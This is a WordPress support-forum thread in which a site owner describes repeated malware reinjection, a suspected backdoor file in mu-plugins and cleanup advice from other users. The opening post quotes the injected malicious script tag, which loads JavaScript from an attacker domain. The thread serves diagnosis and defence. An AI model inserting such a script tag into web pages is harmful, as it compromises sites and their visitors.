donatelloflowfirstly malware/virus

  • Resolved pmoondi

    (@pmoondi)


    4 years, 3 months ago

    There was another thread about this that was marked resolved last night for some reason even though the issue has clearly not been resolved.

    I thought I found the backdoor (rms_unique_wp_mu_pl_fl_nm.php) in /wp-content/mu-plugins/ but despite deleting that file and cleaning everything out, the script was reinjected into all of my pages/posts this morning.

    I’ve noticed yesterday the script was injected into header.php which was a first (previously it would go into all posts/pages or functions.php).

    This morning, the url in the script itself was slightly different:
    <script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns1' type='text/javascript'></script>

    In the past it’s been stats.js or stat.js

    How the hell do we get rid of this thing? Wordfence has not been helpful!

    Removing the redirect/script code is easy enough, but please do not mark this thread as resolved until we get the backdoor identified and removed as this virus is relentless and keeps coming back.

    • This topic was modified 4 years, 3 months ago by pmoondi.
Viewing 3 replies - 1 through 3 (of 3 total)

  • I have the same problem. I make changes to files with suspicious codes and the next day the site is redirected and attacked by malware again.

    Plugin Support wfphil

    (@wfphil)

    Hi @pmoondi & @tato-ferreira

    There are many aspects of your website security that it is impossible for any WordPress security plugin to protect against.

    You will need to carry out a very thorough and extensive investigation as outlined in our site cleaning guide below:

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    A Z

    (@ahmedzeidan)

    Hi there,

    From my experince, rms_unique_wp_mu_pl_fl_nm.php belongs to a nulled theme or plugin which gives hackers access back to your website, you need to review all the plugins and remove the nulled / old ones with no support since the malware script finds its way around it.

    Even after cleaning the DB/scripts, the malware original code is sitting there as encrypted code that executes itself and therefore you get hacked every couple of days.

    Hire a security professional to clean the encrypted malware files and fix the vulnerability once and for all.

    Ahmed

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘donatelloflowfirstly malware/virus’ is closed to new replies.

Tags